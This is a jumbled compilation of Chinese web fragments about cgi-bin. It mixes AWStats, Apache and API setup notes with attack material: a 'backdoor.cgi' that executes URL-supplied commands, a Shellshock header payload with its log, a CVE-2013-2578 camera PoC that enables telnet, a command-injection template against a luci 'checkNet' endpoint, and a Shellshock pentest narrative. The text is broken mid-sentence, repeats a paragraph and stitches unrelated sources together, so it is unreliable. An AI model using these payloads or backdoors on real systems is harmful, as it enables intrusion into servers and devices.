documentation (file docs/index.html) -----> Update model config file '/usr/local/awstats-7.7/wwwroot/cgi-bin You can do it manually by adding the following command to your cron: /usr/local/awstats-7.7/wwwroot/cgi-bin /awstats.pl \ -dir=/www/wwwroot/awstats/ Launch update process : "/usr/local/awstats/wwwroot/cgi-bin /awstats.pl" -config=nmtui.com -update -configdir= Build main page: "/usr/local/awstats/wwwroot/cgi-bin -config=nmtui.com -staticlinks -lang=cn -output Build alldomains page: "/usr/local/awstats/wwwroot/cgi-bin
在网站根目录建立建立cgi-bin文件夹 #mkdir ~/youdomain.com/cgi-bin PS:youdoamin.com是你的域名目录名称或你自定义的目录名称 。 3. /bin/sh CGIFILE=”$HOME/youdomain.com/cgi-bin/php.cgi” INIFILE=”$HOME/youdomain.com/cgi-bin/php.ini” cp /bin/sh CGIFILE=”$HOME/youdomain.com/cgi-bin/php.cgi” INIFILE=”$HOME/youdomain.com/cgi-bin/php.ini” cp 改变php_update.sh的访问权限 #chmod +x ~/youdomain.com/cgi-bin/php_update.sh 5. 运行php_update.sh #~/youdomain.com/cgi-bin/php_update.sh 6.
装完Apache,需要修改apache的配置文件: nano /etc/httpd/conf/httpd.conf 配置文件中有 ScriptAlias /cgi-bin/ "/var/www/cgi-bin /"这个指令,指示了默认的cgi-bin的路径。 /var/www/cgi-bin/,在配置文件中也可以看到。 将该文件命名为first.cgi,然后放入/var/www/cgi-bin/目录中。 将first.cgi的权限设置成755 chmod 755 /var/www/cgi-bin/first.cgi 再次运行http://localhost:9000/cgi-bin/first.cgi,
cd /tmp mkdir cgi-bin echo '#!/bin/bash' > . /cgi-bin/backdoor.cgi echo 'echo -e "Content-Type: text/plain\n\n"' >> . /cgi-bin/backdoor.cgi echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi chmod +x . /cgi-bin/backdoor.cgi python -m http.server --cgi wget -q -O - "http://localhost:8000/cgi-bin/backdoor.cgi
---------------------------- 1、在Tomcat的webapps目录下建立文件夹awstats,把下载包wwwroot下的classes、js、css、icon等目录(除了cgi-bin 2、新建WEB-INF目录; 3、在WEB-INF下新建cgi-bin目录 4、在WEB-INF下新建web.xml,内容如下: <? --其他部分--> </Context> 6、测试,在webapps\awstats\WEB-INF\cgi-bin目录下创建一个test.cgi,内容如下: print "Content-type: =1 在awstats/WEB-INF/cgi-bin目录下新建data目录,保存分析数据 配置完成。 访问地址:http://localhost:8080/awstats/cgi-bin/awstats.pl cgi-bin/common.conf目录有很多选项控制awstats,可参考官方文档进行修改
4.采用技术无关的url 提供动态内容服务时,像cgi-bin之类的单词不应该出现在url中。 说明:本次url重构主要是对直出页面做的。 搜索结果页 http://ke.qq.com/cgi-bin/courseList? bid=226209 图谱首页 http://ke.qq.com/cgi-bin/ke_graph? var KEY_MAP ={ '/cgi-bin/courseDetail': 'H', '/cgi-bin/courseList': 'K', ... }; 比如用户访问课程详情页 http://ke.qq.com/cgi-bin/courseDetail?
4.采用技术无关的url 提供动态内容服务时,像cgi-bin之类的单词不应该出现在url中。 说明:本次url重构主要是对直出页面做的。 搜索结果页 http://ke.qq.com/cgi-bin/courseList? bid=226209 图谱首页 http://ke.qq.com/cgi-bin/ke_graph? var KEY_MAP ={ '/cgi-bin/courseDetail': 'H', '/cgi-bin/courseList': 'K', ... }; 比如用户访问课程详情页 http://ke.qq.com/cgi-bin/courseDetail?
2:通过http://<ip-cam>/cgi-bin/reboot 重启设备。 2:通过http://<ip-cam>/cgi-bin/reboot重启设备。 3:通过[CVE-2013-2578]漏洞开启Telnet服务。 下面的PoC启动telnet服务: GET /cgi-bin/admin/servetest? action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade? action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade?
]# rm -fr /tmp/aa [root@host cgi-bin]# cat /var/www/cgi-bin/hi #! : () { :;}; echo aa>/tmp/aa' https://localhost/cgi-bin/hi dbapp [root@host cgi-bin]# tail -n1 /var/ log/httpd/ssl_access_log ::1 - - [24/Sep/2014:18:22:05 +0200] "GET /cgi-bin/hi HTTP/1.1" 200 4 "-" "( ) { :;}; echo aa>/tmp/aa" [root@host cgi-bin]# ls -l /tmp/aa -rw-r--r--. 1 apache apache 3 24 sept. 18:22 /tmp/aa [root@host cgi-bin]# sestatus SELinux status: enabled
/gnocchi" ## Directories, there should at least be a declaration for /var/www/cgi-bin/gnocchi < /var/www/cgi-bin/gnocchi/app # chown -R gnocchi.gnocchi /var/www/cgi-bin/gnocchi 5. /var/www/cgi-bin/aodh/app # chown -R aodh.aodh /var/www/cgi-bin/aodh 完成安装 1. /var/www/cgi-bin/panko/app # chown -R panko.panko /var/www/cgi-bin/panko/ 5. api/app.wsgi /var/www/cgi-bin/ceilometer/app # chown -R ceilometer.ceilometer /var/www/cgi-bin/ceilometer
首先,修改apache2.conf <Directory "/var/www/cgi-bin"> AllowOverride None Options ExecCGI Order allow,deny Allow from all </Directory> <Directory "/var/www/cgi-bin sites-available内容为 <VirtualHost *:8080> ServerAdmin webmaster@localhost DocumentRoot /var/www/cgi-bin ScriptAlias /cgi-bin/ /var/www/cgi-bin/ ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> 添加ports.conf内容为Listen 8080 向/var/www/cgi-bin
3、拷贝cgi、data、icon cp -r /usr/local/awstats/wwwroot/cgi-bin//usr/local/apache2/cgi-bin/awstats mkdir - /awstats/awstats.pl -update-config=www.web.cn 在浏览器中打开以下网站 http://www.web.cn/cgi-bin/awstats/awstats.pl 访问地址: http://www.web.cn/cgi-bin/awstats/awstats.pl? vi /usr/local/apache2/conf/httpd.conf /usr/local/apache2/cgi-bin/awstats“> AllowOverride authconfig 将3个文件复制到cgi-bin/awstats/plugins/下 修改qqhostinfo文件 require”/usr/local/apache2/cgi-bin/awstats/plugins/qqwry.pl
(negotiated resources): 297 #AddHandler type-map var 告诉服务器cgi和pl后缀的文件都是cgi脚本,编写python脚本,并放入/var/www/cgi-bin 浏览器输入: www.localhost.com/cgi-bin/wang.py 编写shell脚本,并放入/var/www/cgi-bin/目录下 #! 浏览器输入: www.localhost.com/cgi-bin/wang.sh 这样直接通过URL对用户不友好,但给前端提供了接口,于是我又写了个html文件,放在www/html文件夹中,名为test.html 服务器通常会有一个www/cgi-bin的目录,我在这里放一个shell脚本,名为test2 #! 第4句就是将URL解码 第5句是执行命令并返回给客户端 然后在浏览器中输入URL:127.0.0.1/cgi-bin/test2?
appid: $appid grant_type: $grant_type secret: $secret url: /cgi-bin request: method: GET params: access_token: ${access_token} url: /cgi-bin /token api: api/get_access_token.yml export: - access_token - name: /cgi-bin/tags/get api: api/select_tags.yml # testsuites/tags_suits.yml config: name: 查询标签 teststeps: - name: /cgi-bin /token testcase: testcases/get_access_token_case.yml - name: /cgi-bin/tags/get testcase: testcases
1、fofa语句body="cgi-bin/luci" && body="#f47f3e"2、数据包POST /cgi-bin/luci/api/auth HTTP/1.1Host: XXXXXXXXXX.comContent-Type 605.1.15{"method":"checkNet","params":{"host":"`echo c149136B>666666.txt`"}}3、访问 http://XXXXXXXXXXXX:XXXX/cgi-bin reference: metadata: verified: true max-request: 1 fofa-query: body="cgi-bin/luci" && body= to_lower(rand_base(10))}}" boundary: "{{to_lower(rand_base(20))}}"http: - raw: - | POST /cgi-bin {"method":"checkNet","params":{"host":"`echo {{666}}>{{filename}}.txt`"}} - | GET /cgi-bin
> <IfModuledir_module> DirectoryIndex index.php index.htm index.html </IfModule> ScriptAlias/cgi-bin / "c:/Apache24/cgi-bin/"改为=> ScriptAlias/cgi-bin/ "D:/phpEnv/Apache24/cgi-bin" <Directory"c:/Apache24 /cgi-bin">AllowOverride None Options None Require all granted </Directory> 改为=> <Directory"D:/ phpEnv/Apache24/cgi-bin"> AllowOverride None Options None Require all granted </Directory> 3
找到类似下面这一行 ScriptAlias /cgi-bin/ "d:/Program Files (x86)/Apache Software Foundation/Apache2.2/cgi-bin/ " "/cgi-bin/"表示web地址,比如默认是http://localhost/cgi-bin/,即访问cgi的根目录。" 我这里就不改了,一会我们写好的CGI程序直接放在这个cgi-bin文件夹下,再通过http://localhost/cgi-bin/访问即可。 在配置设置-常规中,更改输出目录为cgi-bin下。我就改成cgi-bin\test\,这样我们生成的可执行文件就会被放在这里。 F7编译后,我们来到cgi-bin/test/中,就可以看到我们编译生成好的"cgi_test.cgi"文件。
corpid=ID&corpsecret=SECRET https://qyapi.weixin.qq.com/cgi-bin/gettoken? access_token=ACCESS_TOKEN&id=ID https://qyapi.weixin.qq.com/cgi-bin/department/list? https://qyapi.weixin.qq.com/cgi-bin/department/get? access_token=ACCESS_TOKEN&userid=USERID https://qyapi.weixin.qq.com/cgi-bin/user/get? 3、获取部门成员详情 **请求方式:**GET(HTTPS) **请求地址:**https://qyapi.weixin.qq.com/cgi-bin/user/list?
1、HTML代码-----cgi101.html <html> <title>Interactive Page</title> <body> <form method=POST action="<em>cgi-bin</em> <P><input type=text name=user> <P><input type=submit> </form> </body></html> 2、响应的python 代码----<em>cgi-bin</em> 2、修改action响应的地址 在HTML代码中的<form method=POST action="cgi-bin/cgi101.py">中的action部分表示请求响应的地址,应改为action= "http://localhost:8082/cgi-bin/cgi101.py" ,其中8082表示端口好,根据自己的情况修改。 四、修改后的运行结果 注意:最后将响应的pythonwen文件放在cgi-bin文件夹下,否则有的浏览器会出现501错误
1.3 主动扫描:字典扫描 扫描网站目录和页面,发现/cgi-bin/目录。 扫描/cgi-bin/目录下的目录和页面,发现test页面。 但是/cgi-bin/test页面没啥内容 1.4 主动扫描:漏洞扫描 扫描/cgi-bin/目录下的漏洞,疑似存在shellshock破壳漏洞。 2. 初始访问 2.1 利用面向公众的应用 通过UA头向CGI程序的环境变量注入恶意代码,在CGI程序处理CGI请求时触发执行,确认/cgi-bin/test页面存在破壳漏洞,可以执行任意命令。